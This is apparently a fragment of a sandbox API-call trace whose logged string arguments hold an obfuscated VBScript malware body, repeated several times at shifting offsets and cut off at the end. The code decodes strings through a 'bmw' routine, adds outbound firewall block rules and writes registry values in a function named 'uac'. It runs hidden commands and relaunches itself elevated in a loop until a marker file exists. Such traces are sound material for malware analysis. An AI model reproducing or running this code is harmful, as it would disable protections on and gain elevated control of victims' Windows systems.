ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.005] wcsncmp (_String1="\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 75 [0223.005] wcsncmp (_String1="\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0223.005] wcsncmp (_String1="rule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.005] wcsncmp (_String1="ule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = 